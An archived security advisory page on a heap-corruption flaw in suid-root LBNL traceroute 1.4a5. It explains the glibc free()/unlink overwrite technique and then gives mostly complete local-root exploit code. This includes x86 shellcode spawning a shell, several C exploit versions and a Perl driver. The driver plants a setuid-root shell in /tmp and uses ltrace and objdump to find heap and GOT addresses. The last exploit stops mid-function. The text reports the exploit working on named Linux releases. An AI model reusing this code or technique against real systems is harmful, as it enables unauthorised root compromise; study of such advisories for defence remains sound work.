TUCoPS :: Linux :: General :: troute1.htm

LBNL 1.4a5 traceroute exploit
Vulnerability

    traceroute

Affected

    LBNL 1.4a5 (Where LBNL = Lawrence Berkeley National Laboratory)

Description

    Chris Evans found following.  He did not discover this flaw.   The
    flaw was  discovered by  Pekka Savola,  who noted  that traceroute
    could be caused to crash, which is pretty suboptimal behaviour for
    a suid-root program.  Chris  took this forward and speculate  that
    in fact this very minor code flaw may well be exploitable.

    First, some background reading, namely Solar Designer's  excellent
    discussion on  the generic  exploitation of  heap overflows.   The
    discussion shows nicely how heap mismanagement is fatal.  However,
    overflowing a malloc()'ed buffer is not the only bad thing you can
    do to the heap.  In  the case of traceroute, there was  a reliable
    way of  making traceroute  call free()  on a  pointer that was not
    obtained with malloc().

    This flaw in traceroute (if your version is vulnerable) is tickled
    like this:

        traceroute -g 1 -g 1       (guess is it didn't need a hostname)
        Segmentation fault

    Looking at the code, there is a file "savestr.c", which contains a
    function  savestr().   This  savestr()  function  is essentially a
    strdup()  function,  but  with  the  difference that an attempt is
    made  to  cut  down  on  the  number  of  malloc() calls.  This is
    accomplished  by  malloc()'ing  a  large  block  and  handing  out
    pointers _inside_ this block as savestr() is repeatedly called.

    So where does this all go wrong? Unfortunately, the clients of the
    savestr() method seemed to treat savestr() like it was strdup()  -
    i.e. all pointers  returned must be  free()'d or you  have a leak.
    This is  not the  case, so  we have  the flaw:  free() called on a
    pointer not allocated by malloc().

    Let's have a look at  some cheesy ASCII diagram showing  the block
    of memory allocated by savestr():

          -----------------------------------------------
          |                                             |
          -----------------------------------------------
          ^                   * ^
          |                     |
        address               free()
        returned              called
        by malloc()           here (2nd
        and 1st savestr()     savestr call
        call                  result)

    The reason this is so serious is that the free() call will attempt
    to do a bit of free chunk management. This involves memory writes.
    The memory writes are  controlled by a "malloc  chunk" descriptor,
    which resides just  before the address  returned by malloc(),  and
    passed by free().  Looking  at the above diagram, the  location of
    the descriptor  used by  the faulty  free() called  is marked by a
    "*".  Bad news  - that's in a  region of memory controlled  by the
    malicious user.

    No exploit  is currently  known, although  it is  believed than an
    exploit could  well be  possible.   A working  exploit would  be a
    chilling reminder that the slightest flaw in a security  sensitive
    program is fatal, even if the flaw looks harmless at first glance.

    If an exploit _is_ produced, it'll gain root access.  Ouch.   This
    really should  not be  the case.   A sensible  and fault  tolerant
    traceroute solution  should allocate  a raw  socket and  then drop
    privileges on  startup (quite  a few  do this).   This limits  the
    severity of  the hole  to being  able to  gain a  raw socket.  Not
    good but infinitely better than a root compromise.

    What is causing the  segmentation fault is freeing  of unallocated
    memory, not the fact that you are calling free in the middle of  a
    chunk  of  malloced  memory.   This  code  will  produce SIGBUS on
    solaris  and  other  hardware  that  supports  a misaligned access
    exceptions.

    The second -g 1  causes a free() on  an unallocated pointer.   The
    problem is that the  second 'savestr' doesn't actually  allocate a
    chunk of memory for hi->name,  so when free is called  against the
    bogus  pointer  it  segfaults  in  chunk_free.   The  hi->name  is
    actually  written  to  an  unallocated,  but unused portion of the
    heap.

    'dvorak' offered his  text on this  issue.  This  text starts with
    the story  about the  exploit.   The exploit  can be  found at the
    end, but getting it to work might require reading the story.

    We won't go into details  about malloc internals because we  think
    it's not needed and you should be able to find that out  yourself.
    (ok probably closer to  the truth is that  we can't explain it  as
    clear as the source of malloc does: we don't understand the malloc
    internals well enough to be able to explain it clearly.)

    What you  should know  is that  the internals  of malloc work with
    chunks in which they  keep the data.   Malloc gives out a  pointer
    to the  memory to  the user.   These pointers  are actually ((char
    *)chunk)+8,  hope  that  helps  in  the explanation.  Its possible
    to get  free() to  work with  incorrect chunks,  which is the base
    for the exploit.

    Using nice ascii it looks like:

        chunk
         |
         |
         +--->+--------------
              | prev_size
              +--------------
              | size
         +--->+--------------
         |    | fd  or data
         |    +--------------
         |    | bk  or data
         |    +--------------
         |    | ....
         |
        mem

    chunk is used as pointer in  the internals of malloc while mem  is
    the pointer given  to the user.   If the chunk  is not being  used
    (that is the  chunk hasn't been  given to the  user using malloc()
    or the user  has retunred the  chunk) fd and  bk are used  to hold
    pointers.  If chunk is in use they are used to hold data.

    What happens if  free(mem) is called?   First free() converts  mem
    into a chunk ((char  *)mem) - 8) on  the Intel. free() then  calls
    chunk_free() to do the rest.

    The chunk  given to  chunk_free() as  argument will  be called 'p'
    during the rest of the text.  Using p->prev_size (the size of  the
    previous chunk)  and p->size  (the size  of chunk  p) chunk_free()
    finds the previous  chunk (called prev  from now on)  and the next
    chunk (called next from  now on).  It  then checks if next  and/or
    prev are  chunks which  aren't in  use (by  checking chunk->size &
    PREV_INUSE).  If  they aren't p  is linked into  the double linked
    list of free chunks using the fd and bk field of prev and/or next.

    This linking  into the  free chunks  list is  done using the macro
    'unlink':

        #define unlink(P, BK, FD) \
        {                         \
          BK = P->bk;             \
          FD = P->fd;             \
          FD->bk = BK;            \
          BK->fd = FD;            \
        }

    If we manage to let chunk_free call unlink() with a chunk of which
    the fields fd and bk have been filled in by us, we will be able to
    change values in memory:

        if chunk->fd = (int *) x and chunk->bk = (int *) y
        after an unlink() of that chunk
        x[3] will be y
        and
        y[2] will be x

    Example source:

        [dvorak@redhat free]$ cat free.c
        void main(void) {
	        unsigned int *chunk;
	        int i;
	        unsigned int shellcode[10];
	        unsigned int ret_addr_2_change = 9;

	        /* Get some space */
	        chunk = malloc(0x8);

	        /* now setup the chunk to fool chunk_free()
	           By making prev_size negative it will look
                 _after_ this chunk in stead of in front of it
               */
	        chunk[0] = -0x10;	/* prev_size */
	        chunk[1] = 0x8;		/* size */
	        chunk[2] = shellcode;   /* fd */
	        chunk[3] = shellcode;   /* bk */

	        /* set fd to the adres of the return address - 3
	           the minus 3 is needed because fd[3] will become bk
	           bk will be set to point to our shellcode. Remember that
	           bk[2] will be changed to contain fd so that there should be
	           a jmp or so in the shellcode to skip that value.
                 */
	        chunk[4+2] = (int) (&ret_addr_2_change - 3);
	        chunk[4+3] = (int) (shellcode);

	        /* set shellcode to 0 so that we can see the change */
	        memset(shellcode, 0, sizeof(shellcode));

	        printf("ret before call: %x\n", ret_addr_2_change);
	        printf("address of ret: %x\n", &ret_addr_2_change);
	        printf("address of shellcode: %x\n", shellcode);
	        /* remember we give mem to free which finds the chunk based on
                 that */
	        free(chunk+2);

	        printf("ret now: %x\n", ret_addr_2_change);
	        for (i = 0 ; i < 10; i++) {
		        printf("sh: %d : %x\n", i, shellcode[i]);
	        }
        }
        [dvorak@redhat free]$ make free
        cc free.c -o free -g
        free.c: In function `main':
        free.c:8: warning: assignment makes pointer from integer without a
        cast
        free.c:15: warning: assignment makes integer from pointer without a
        cast
        free.c:16: warning: assignment makes integer from pointer without a
        cast
        free.c:1: warning: return type of `main' is not `int'
        [dvorak@redhat free]$ ./free
        ret before call: 9
        address of ret: bffffb44
        address of shellcode: bffffb48
        ret now: bffffb48
        sh: 0 : 0
        sh: 1 : 0
        sh: 2 : bffffb38
        sh: 3 : 0
        sh: 4 : 0
        sh: 5 : 0
        sh: 6 : 0
        sh: 7 : 0
        sh: 8 : 0
        sh: 9 : 0
        [dvorak@redhat free]$ exit

    As we can  see we successfully  overwrote the return  address with
    the address of our shellcode.   An extra example is at the  end of
    the  text  (main  difference  is  that  prev is now located on the
    stack.)  How do we use this to exploit traceroute?

    First lets look at what we can do with traceroute.  After  parsing
    of the second  -g option, just  before the call  to freehostinfo()
    the buffer looks like this:

        ---------------------------------------------
        argument of first -g\x00argument of second -g
        ------------------------^--------------------
                                |

    Free  will  be  called  with  this  address  as  argument.   After
    calculating  the   address  of   the  chunk,   free()  will   call
    chunk_free().  The pointer  that chunk_free() receives will  point
    to an address which contains the  last 7 bytes of the argument  to
    the first -g option terminated by a '\0' byte.

    What can we put into these 7 bytes?  When looking at the source of
    traceroute we see that these 7  bytes will be the last 7  bytes of
    the argument  supplied to  the first  -g option  if and  _only if_
    inet_addr(argument) or gethostbyname(argument) returns without  an
    error.   A quick  look at  the source  of inet_addr  gives us  the
    information  that  it  will  return  success  with  an argument of
    "ipaddr_in_dot_notation<space><what   ever   (binary   data    for
    instance)>"

    So we basically can get anything in those last 7 bytes except '\0'
    bytes.  This leads to the following chunk fields:

        START of chunk
        | prev_size | size      |
        XX XX XX XX XX XX XX 00
        
            with XX non zero.  Or converted to int's
        
        p->prev_size = 0xXX XX XX XX with no byte equal to zero.
        p->size = 0x00 XX XX XX with the msb equal to zero and the other 3 bytes non zero.

    chunk_free finds it's next chunk using:

        ((char *)p) + (p->size & ~(PREV_INUSE))   // PREV_INUSE = 0x01

    Next will be searched at 0x00010101 bytes above p at the least  or
    0x00ffffff bytes above p at  most.  Unfortunately this will  never
    lead to next being in addressable memory space so here the exploit
    attempt ends.

    'dvorak' was talking  this over with  Scrippie and he  told him to
    take  a  look  at  some  of  the  runtime parameters of the malloc
    system.  One of these was the environment variable MALLOC_TOP_PAD_
    which is used  to pad sbrk  calls.  The  result of MALLOC_TOP_PAD_
    being  set  to  1000000  is  that  more  then  just the 1024 bytes
    required by traceroute  are allocated using  sbrk. Now next  could
    be in addressable memory.  Time for the real exploit.

    First attempt.  The first address should be

        1.2.3.4 \xe0\xff\xff\xff\x01\x01\x01\x00

    chunk_free would lookup  'next' and find  it addressable and  zero
    (which would lead to a crash, at least it seemed to crash  because
    of did, but looking at  the malloc source suggests that  is should
    work fine).   It will then  continue to find  'previous' which was
    -0x20 in size  or located 32  bytes after 'p'.   We could set  the
    argument of the  second -g option  so that at  32 bytes after  'p'
    there  would  be  a  correct  chunk  which would, when used in the
    unlink(),  lead  to  the  return  address  being  overwritten (and
    hopefully to root).

    The  first  problem  showed  immediately.   One  of  the checks in
    chunk_free is:

        if (next == top(ar_ptr)) with ar_ptr = arena_ptr(p);

    Looking at the source of malloc.c one can see that this will  lead
    to a crash of p points above the last block of malloced memory (ok
    this  isn't   100%  correct   but  it   should  suffice   for  the
    explanation).   The last  block of  malloced memory  is the  block
    returned by the malloc(1024) call in savestr.c of traceroute,  but
    this  block  is  already  free()'d  after  processing the first -g
    option, so p was  pointing to far in  memory.  One byte  to far to
    be exact.  This was solved by not using 1.2.3.4 as ip-address  but
    using 1.2.33 instead (which is legal - look at inet_addr.c).

    The exploit at that time looked like this:

    /*
	    Just some notes to myself while coding told me what to do etc.
	    The first argv explains it in more human language the second
	    was used by me to try to organize my thoughts.

	    argv0: bS

          argv1: -g the ip_address then the fake data for chunk p
	    argv1: 1.2.3.4 \xc0\xff\xff\xff\x04\x01\x01\x00

          argv2: -g the ip address then some padding then the fd and bk
                   pointers which should give us root.
                   The weird calculation for the address of the
                   shellcode is because we can't really use nops etc
                   because
                   part of the code is overwritten (bk[2] = fd ..)
                   so we try to calculate where is will be placed
                   this calculation turned out to be incorrect ;)
	    argv2: 123.123.123.123 addr_2_change_etc shellcode_addres
                 (0xc0000000 - 8 - (strlen(argv3) + 1) - (strlen(env) +
    1))

          argv3: this argument will be used for the shellcode
                 including the extra jmp
	    argv3: jmp forward 12 bytes or so + nop nop nop + shellcode

    */

    #include <stdio.h>


    char shellcode[] =
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/sh";

    char jmp_forward[] = "\xeb\x0c";

    /*
     Stupid and useless function to convert an int to a character array
     what happened to:
     char p[5];
     ((int *)p) = val;
     p[4] = '\0';
     ??
     */
    void make_addr(char *res, unsigned int val)
    {
	    int i;
	    char *p = (char *) &val;

	    for (i = 0; i < 4; i++)
		    res[i] = (char) *p++;
	    res[i] = '\0';
    }

    int main(int argc, char *argv[])
    {
	    char addr1[1000];
	    char addr2[100];
	    char execute_me[100];
	    char *arg[] = {"./traceroute", addr1, addr2, execute_me, NULL};
	    char *env[] = {"MALLOC_TOP_PAD_=1000000", NULL};

	    char shell_addr[5];
	    char ret_addr[5];

	    /* the first argument -g option */
	    snprintf(addr1, sizeof(addr1), "-g9.2.3.3 "
	                    "\xc0\xff\xff\xff\x04\x01\x01");
	    /* yeah I am lazy d0h */
	    memset(execute_me, 0x41, 100);
	    strncpy(execute_me, jmp_forward, strlen(jmp_forward));
	    strcpy(execute_me+20, shellcode);

	    /* this calculation is already a little bit better, but
	       still not good enough
	     */
	    make_addr(shell_addr, 0xc0000000 - 8 - (strlen(arg[3]) + 1) -
	                          (strlen(env[0]) + 1));
	    make_addr(ret_addr, strtoul(argv[1], 0, 0) - 12);

	    /* another failure.. in addr1 we set p->size to 0xffffffc0 or
	       -0x40 so the ret_addr and shell_addr are definitly at the wrong
	       spot, never drink and code is the lesson i guess.
	     */

	    snprintf(addr2, sizeof(addr2), "-g1.2.3.4 %s %s", ret_addr, shell_addr);
	    /* talking about well hmm misplaced confidence in my own code */
	    printf("Going for root!!!\n");
	    execve(arg[0], arg, env);
    }

    Well as you can see in the comments we made an awful lot of stupid
    mistakes which all make sure the exploit can't work.  After trying
    the above exploit 'dvorak' got a crash (how suprising).  The first
    problem  was  p  being  above  the  highest  malloced  block so he
    changed the ip  address of the  first -g option  to 1.2.33.   This
    eliminated the first crash.

    Looking further into  the result of  his exploit 'dvorak'  noticed
    something weird.   p->prev_size and  p->size weren't  even correct
    (that is they  weren't 0xffffffc0 and  0x00010101) and since  both
    are essential for the exploit to work he looked further into  this
    behaviour.  After  adding a couple  of printf's to  the traceroute
    source (he is absolutely no gdb guru) the following showed:

        traceroute-1.4a5]$ ./traceroute -g 245.245.245.245 -g 123.123.123.123
        #
        the first address of hi->name, this is the address of the buffer malloced in save_str
        #
        hi->name: 0804cf18

        #
        This is what the buffer looks like (well the 10 bytes before and the
        first 13 bytes of the buffer) after the first savestr in gethostinfo
        #
        gethost, savestr:
        00 00 00 00 00 00 09 04 00 00 32 34 35 2e 32 34 35 2e 32 34 35 2e 32
                                      ^
        ^ is the start of the buffer, just before it you can see the p->size
        pointer which is 0x00000409(1033) 1032 for the size (1024 bytes data
        and 8 bytes for the size and prev_size fields). The +1 is because the
        PREV_INUSE is set.

        #
        after the calloc(addrs) in gethostinfo
        #
        gethost, calloc addrs:
        00 00 20 d3 04 08 09 04 00 00 32 34 35 2e 32 34 35 2e 32 34 35 2e 32

        #
        The address of hi (struct hostinfo *) is below the address of the
        buffer, which is logical because it has been calloc'd earlier then
        the malloc(1024) in savestr. The addrs are located above the buffer
        because they are calloc'd later.
        #
        hi: 0804cf08 hi->addrs: 0804d320

        #
        After the address is filled in into addrs, nothing to see because
        addrs is located above the buffer.
        #
        gethost, calloc addrs filled in:
        00 00 20 d3 04 08 09 04 00 00 32 34 35 2e 32 34 35 2e 32 34 35 2e 32

        #
        Back to the getopt loop, just after the return of getaddr(). In
        getaddr() the hostinfo struct and addrs have been free'd, as well as
        the buffer containing our data.
        #
        while getopt after getaddr:
        00 00 20 d3 04 08 f1 10 00 00 a0 7f 10 40 a0 7f 10 40 32 34 35 2e 32
                                      ^
        ^ is the start of the buffer. As can be seen the contents have
        changed, this is because of the free(). Now that p is on the free
        list its fd and bk fields are in use and point to other free blocks.
        The first 8 bytes will be overwritten with this data and since we are
        putting in "1.2.33 etc" the first byte of our fake chunk will be
        overwritten (something to keep in mind).

        #
        After calloc(addrs) for the second -g option the buffer is suddenly
        zero'd out. The reason behind this is that the first calloc(addrs)
        calloc'd data after our buffer (which was still malloc'd at that
        time). Now that the buffer has been free'd the free memory is
        assigned to this calloc.
        #
         gethost, calloc
        addrs:
        00 00 18 cf 04 08 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e1

        #
        Here we see that addrs indeed overlaps with our original buffer.
        #
        hi: 0804cf08 hi->addrs: 0804cf18

        #
        Then the converted ip-address gets filled in. And whats more those 4
        bytes are under our full control (they represent the parts of the ip-
        address given with the second -g option).
        #
        gethost, calloc addrs filled in:
        00 00 18 cf 04 08 11 00 00 00 7b 7b 00 7b 00 00 00 00 00 00 00 00 e1

        #
        segfault after the second free.
        #
        Segmentation fault (core dumped)

    So what do we have now?   The first 4 bytes of the savestr  buffer
    are under full control.  And  what is also nice is that  the bytes
    placed after these 4 byte are zero as well as the bytes before the
    4 bytes.  So what's our next approach?

    The buffer will look like this:

        00 00 00 xx xx xx xx 00 00 00 00 00 00 00 00 00 00

    With xx under our  full control.  We  want to control p->size  and
    p->prev_size  so  we  should  make  sure p points somewhere around
    those xx's.  What's a good place for it to point?

    Immediately at  the start  would be  nice, but  it would also mean
    that p->size is always 0 and  thus that next would be the  same as
    p, which gives less flexibility.  The easiest is to let p point to
    the  byte  just  before  the  xx's.   That  way prev_size would be
    0xyyyyyy00 so  that prev  could be  anywhere in  memory (well  not
    completely, the  last byte  of it's  address can't  be chosen  but
    that shouldn't yield problems) and p->size would be 0x000000xx  so
    that next is at little above 'p'.

    To get p to point to that addres free() should be called with p  +
    8 or (since  the xx are  at the start  of the savestr  buffer) the
    first argument to -g should place 7 bytes in the buffer (including
    the \0 byte).  The exact value of these bytes doesn't matter since
    they will be overwritten.

    The second -g option should  contain the ip address needed  to get
    the correct value  for p->prev_size and  p->size.  Next  we should
    set  up  a  prev  record  somewhere  so that ((char *)p) - p->size
    should point to it, and it  should contain a next record a  little
    further in the second -g option.

    The new exploit:

    /*
	    argv0: at first it looks that this doesn't matter but since
                 this is the value found at the top of the stack and thus
                 it's length matter for the location of the shellcode.

	    argv0: bs

          argv1: nothing is needed for this it should just contain
                 6 bytes and a 0 (and off course it should be acceptable
                 to inet_addr)
	    argv1: only specific length
	           addr1 will become: 4 bytes from addr2 + zeros
                 length so that p->size = last byte + 3 zeros
                 p->prev_size = first 3 bytes + 00
                 thus: 6 bytes + 0
                 p data:
                 size = 0x20 or so;
                 prev_size = ((char *)p) - ((char *) eleet stack pointer)
                 p = addr2 - 7 - 8

                 so next data should be on addr2 + 0x20 - 7 - 8
          argv2: this requires much more thought, the ip_address should be
                 so that p->prev_size and p->size make sense.
                 p->prev_size should be so that prev can be found on the
                 stack since that's an easy place to put it, p->size should
                 be 0x20 or so so that we can put the next chunk in this
                 argument too.
	    argv2: ip addres so that: p->size makes sure next is
	           somewhere in argv2
		    p->prev_size should point to eleet data on stack (through
		    environment)
		    spacing: next data:
			    prev_size = 0x41414141;
			    size = 0xfffffff0
			    fd = some_random_pointer (or you could use him)
			    bk = some_random_pointer
		    after that: data for next (prev_size + size + fd + bk)
		    prev_size probably negative
          argv3: contains the chunk used for prev and the shellcode
                 including the jmp.
	    argv3: eleet data on stack + eleet shellcode baby
                 eleet data:
                 prev_size = BS;
                 size = BS
                 fd = &ret_addr_change - 12
                 bk = shellcode;
                 shellcode = jmp forward + nops + code
    */

    #include <stdio.h>

    /*
    easy shellcode - remember there is a certain trick in this baby like
    not starting /bin/sh but /tmp/sh (yes the 0 byte is written by the
    code itself so make sure there is something worthwhile in /tmp/sh
     */
    char shellcode[] =
    "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
    "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
    "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/tmp/sh-O=";

    /*
     code to jump forward
     */
    char jmp_forward[] = "\xeb\x0c";

    /*
     again the stupid make_addr function ;)
     */
    void make_addr(char *res, unsigned int val)
    {
	    int i;
	    char *p = (char *) &val;

	    for (i = 0; i < 4; i++)
		    res[i] = (char) *p++;
	    res[i] = '\0';
    }

    /*
     which argument number contains the leet_addr and the shellcode?
     */
    #define LEETARG 7

    int main(int argc, char *argv[])
    {
	    char addr1[1000];
	    char addr2[1000];
	    char padding[256];
	    char execute_me[1000];
	    int execute_shift = 0;
	    /* next data: prev_size = crap, size=crap and fd and bk
	       point to someplace innocent in the stack, if you want
	       to you can use it to change a second memory place.
	     */
	    char *next_data = "\x41\x41\x41\x41\xf0\xff\xff\xff"
	                      "\xf0\xfd\xff\xbf\xf0\xfd\xff\xbf";
	    char *leet_data;
	    /*
	     The arguments to start traceroute with, -g separated from its
	     argument because of getopt.
	     */
	    char *arg[] = {"/usr/sbin/traceroute", "-g", addr1, "-g",
	               addr2, "127.0.0.1", "12", execute_me, NULL};
	    unsigned int leet_amount;
	    /*
	     This needs some explanation: since the prev chunk will be at
	     a certain distance from p we need to know p since it changes
	     from binary to binary we'll let the attacker figure it out
	     and give it to us ;).
	     */
	    unsigned int p = strtoul(argv[2], 0, 0);

	    char shell_addr[5];
	    char ret_addr[5];

	    /* the first addr 6 bytes long */
	    snprintf(addr1, sizeof(addr1), "1.2.11");

	    /*
	     First we fill execute_me (which will make the LEETARG) with
	     0x41 thats both a NOP and easy to find on the stack.
	     */
	    memset(execute_me, 0x41, sizeof(execute_me));

	    /*
	     We put the shellcode and the jmp at the end of execute_me
	     */
	    strncpy(execute_me+sizeof(execute_me)-strlen(shellcode)-20-1,
	            jmp_forward, strlen(jmp_forward));
	    strcpy(execute_me+sizeof(execute_me)-strlen(shellcode)-1,
	           shellcode);

	    /*
	     Calculate the address of the shell_code
	     the stack at startup looks like:
	     arg4 arg5 arg6 argLEETARG environment arg0 4 bytes
	     since the environment is gone and LEETARG is the last argument
	     we only need the length of the shellcode and the length of arg0
	     */
	    make_addr(shell_addr, 0xc0000000 - 4 - (strlen(arg[0]) + 1) -
	              (strlen(shellcode) +1 + 20));
	    /*
	     We also ask the attacker to give the address of the pointer to
	     change to point to the shellcode. Something in the GOT is
	     usually very nice
	     */
	    make_addr(ret_addr, strtoul(argv[1], 0, 0) - 12);

	    /*
	     leet_data should be in 0xbfff fe00 + (p & 0xff)
	     now we calculate the address where chunk_free() will look for
	     prev chunk.
	     We put prev chunk somewhere between 0xbffffe00 and 0xbfffff00
	     the precise position is defined by the lsb of p.
	     */
	    printf("p: 0x%08x\n", p);
	    leet_data = (char *) (0xbffffe00 + ((int)p & 0xff));
	    printf("leet_data: 0x%08x\n", leet_data);
	    /*
	     calculate the value of p->prev_size
	     */
	    leet_amount = p - (0xbffffe00 + ((int)p & 0xff));
	    printf("leet_amount: 0x%08x\n", leet_amount);

	    /* the end of execute_me will be on 0xc0000000 - 8
	       length of execute_me should thus be:
	       0xc0000000 - leet_data - 8
	       2 possibilities: either don't put the fake prev chunk at the
	       beginning of execute_me or change the length of execute_me
	       we choose the latter.
	     */
	    execute_shift = sizeof(execute_me) -
	      (0xc0000000 - (int) leet_data - 4 - (strlen(arg[0]) + 1));
	    printf("execute_shift: %d\n", execute_shift);

	    arg[LEETARG] += execute_shift;

	    /*
	     use strcpy not snprintf since snprintf does 0 terminated its
	     strings
	     */
	    strncpy(arg[LEETARG], "\x41\x41\x41\x41\x31\x31\x31\x31", 8);
	    strncpy(arg[LEETARG]+8, ret_addr, 4);
	    strncpy(arg[LEETARG]+12, shell_addr, 4);

	    printf("execute_len:%d arg0%d\n", strlen(arg[LEETARG]),
	           strlen(arg[0]));
	    printf("execute_me_addr: %08x\n", 0xc0000000 - 4 -
	           strlen(arg[0]) - strlen(arg[LEETARG]) - 2);

	    /*
	     pad the second -g option to place next chunk on the expected
	     position
	     */
	    memset(padding, ' ', sizeof(padding));

	    /*
	     0x20 - p->size
	     - 7 because thats the size of addr1
	     - 8 for p->size and p->prev_size
	     - 12 for addr2 (xx.xx.xx.xx )
	     */

	    padding[0x20 - 7 - 8 - 12] =  '\0';
	    printf("padding: %d bytes\n", strlen(padding));

	    /*
	     put hex equivalent of leet amount in ip_address
	     */
	    snprintf(addr2, sizeof(addr2),
	             "0x%02x.0x%02x.0x%02x.0x%02x%s%s",
	             ((unsigned char *) &leet_amount)[1],
	             ((unsigned char *) &leet_amount)[2],
	             ((unsigned char *) &leet_amount)[3],
	             0x20,
	             padding, next_data);
	    /*
	     This time it should work ;)
	     */
	    printf("Going for root!!!\n");
	    execve(arg[0], arg, NULL);
    }

    Well -  that's it  a working  exploit for  traceroute tested under
    redhat 6.1, 6.2, debian potato  if you have problems or  solutions
    for certain questions raised in this text please contact me.

    Oops indeed  might have  forgotten that:  How to  get the  correct
    value for p?

        $cp /usr/sbin/traceroute ./tra
        $ltrace ./tra -g1

        ltrace can be found at:
        ftp.nluug.nl/pub/os/Linux/distr/debian/dists/stable/main/source/utils/
        ltrace.*.tgz

    Then look at the return value for the malloc(1024) call  substract
    1 and  voila. Copy  the binary  first as  you can't  ltrace a suid
    binary.  A GOT entry is best as the address to change try  exit(),
    getopt()  or  fprintf().   (if  you  don't  know  how to get a GOT
    address though luck, go  read a couple of  phracks or so and  come
    back later).

    To exploit  debian 2.2:  debian has  MAXHOSTLEN defined  as 64  so
    argument 2  is to  long: solution:  move next  chunk forward  from
    0x40 to  0x20 or  so. RedHat  6.2 has  the same  problem therefore
    'dvorak' patched the exploit himself.

    #!/bin/perl

    # build exploit
    system("make ex_god");

    system("echo 'void main(void) { setuid(0); setgid(0);
    execl(\"/bin/sh\", \"sh\", 0);}' > /tmp/sh.c ; make /tmp/sh >
    /dev/null 2>/dev/null");

    # get p
    system("cp /usr/sbin/traceroute ./tra; ltrace -e malloc -o lk ./tra
    -g1 > /dev/null 2>/dev/null; rm ./tra");

    open F, "<lk";

    $line = <F>;
    ($dummy, $p) = split( /\= /, $line,2);
    $p = (hex $p) - 1;
    close F;

    # get a GOT entry
    open F, "objdump -R /usr/sbin/traceroute | grep getopt|";
    $line = <F>;
    ($got, $dummy) = split( / /, $line, 2);
    close F;

    system("./ex_god 0x$got $p");
    --------------------
    /*
     An other free example which places part of the chunk on the stack
     */
    void main(int argc, char *argv[]) {
	    unsigned int *chunk;
	    int i;
	    unsigned int shellcode[10];
	    unsigned int ret_addr_2_change = 9;
	    unsigned int stack[1000];
	    char *p;

	    chunk = malloc(16455*4);
	    chunk = chunk + 22;
	    printf("malloc: %x\n", chunk);

	    /* prev_size */
	    chunk[0] = -(((char *) stack) - ((char *) chunk));
	    chunk[1] = 0x10;	/* size */
	    chunk[2] = -0x10;	/* fd */
	    chunk[3] = -0x10;	/* bk */

	    printf("re: %p\n", &ret_addr_2_change);
	    printf("sh: %p\n", shellcode);


	    chunk[4+0] = 0x41414141;	/* next */
	    chunk[4+1] = 0xfffffff0;
	    chunk[4+2] = (int) (&ret_addr_2_change - 3);
	    chunk[4+3] = (int) (shellcode);

	    stack[+0] = 0x1;		/* prev */
	    stack[+1] = 0x2;
	    stack[+2] = shellcode+5;
	    stack[+3] = shellcode+5;

	    memset(shellcode, 0, sizeof(shellcode));

	    for (i = -4; i < 8; i++)
		    printf("chunk: %d: %08x\n", i, chunk[i]);
	    free(chunk+2);

	    printf("ret now: %x\n", ret_addr_2_change);
	    for (i = 0 ; i < 10; i++) {
		    printf("sh: %d : %x\n", i, shellcode[i]);
	    }
    }

    Here is simpler one:

    #include <stdio.h>
    #include <unistd.h>
    #include <string.h>

    char code[] =
       "\xeb\x34"              /* jmp    GETADDR         */
       "\x90\x90\x90\x90"      /* nop nop nop nop        */
       "\x90\x90\x90\x90"      /* nop nop nop nop        */
       "\x90\x90\x90\x90"      /* nop nop nop nop        */
       "\x90\x90\x90\x90"      /* nop nop nop nop        */
			       /* RUNPROG:               */
       "\x5e"                  /* popl   %esi            */
       "\x89\x76\x08"          /* movl   %esi,0x8(%esi)  */
       "\x31\xc0"              /* xorl   %eax,%eax       */
       "\x88\x46\x07"          /* movb   %al,0x7(%esi)   */
       "\x89\x46\x0c"          /* movl   %eax,0xc(%esi)  */
       "\xfe\x06"              /* incb   (%esi)          */
       "\xfe\x46\x04"          /* incb   0x4(%esi)       */
       "\xb0\x0b"              /* movb   $0xb,%al        */
       "\x89\xf3"              /* movl   %esi,%ebx       */
       "\x8d\x4e\x08"          /* leal   0x8(%esi),%ecx  */
       "\x8d\x56\x0c"          /* leal   0xc(%esi),%edx  */
       "\xcd\x80"              /* int    $0x80           */
       "\x31\xdb"              /* xorl   %ebx,%ebx       */
       "\x89\xd8"              /* movl   %ebx,%eax       */
       "\x40"                  /* incl   %eax            */
       "\xcd\x80"              /* int    $0x80           */
			       /* GETADDR:               */
       "\xe8\xd7\xff\xff\xff"  /* call   RUNPROG         */
       ".bin.sh";              /* Program to run .XXX.XX */

    extern void *__malloc_hook;

    typedef struct glue {
	    int	a;
	    int	b;
	    void	*p;
	    void	*q;
    } glue;

    void print_hex(char *p)
    {
	    char	*q;

	    q=p;

	    while(*q) {
		    if (*q > 32 && *q < 127) {
			    printf("%c",*q);
		    } else {
			    printf(" ");
		    }
		    q++;
	    }
    }

    int main(void)
    {
	    int	ipa=0x2E312E31;
	    int	ipb=0x20312E31;
	    int	oh=0x00000000;
	    int	dummy=0x43434343;
	    void	*mh=(void **)__malloc_hook;
	    void	*usage=(void *)0x804a858;
    /*	void	*us=(void *)0x804cd80;*/
	    void	*us=(void *)0x804cd7a;
	    char	buf[260];
	    char	whocares[4096];
	    char	*prog="/tmp/traceroute";
	    glue	temp;
	    FILE	*out;

	    printf ("malloc_hook %x code %x\n",mh, usage);

	    memset(buf, 0x47,256);
	    buf[255]='\0';

	    printf ("buf: %s\n", buf);
	    temp.a=ipa;
	    temp.b=ipb;
	    temp.p=mh;
	    temp.q=us+16;

	    memcpy(buf, (void *)&temp,16);
	    printf ("buf: %s\n", buf);

	    temp.p=(void *)oh;
	    temp.q=(void *)oh;
	    temp.a=dummy;
    /*	temp.b=dummy;*/
	    temp.b=0xFFFFFF01;

	    printf("code(%d)\n", sizeof(code));
	    strncpy(buf+16, code, sizeof(code) -1);
	    memcpy(buf+240, (void *)&temp, 0x10);
	    printf ("buf: %s\n", buf);
	    buf[255]='\0';

	    out=fopen("/tmp/code","w");
	    fputs(buf,out);
	    fclose(out);
	    printf("%s\n",whocares);

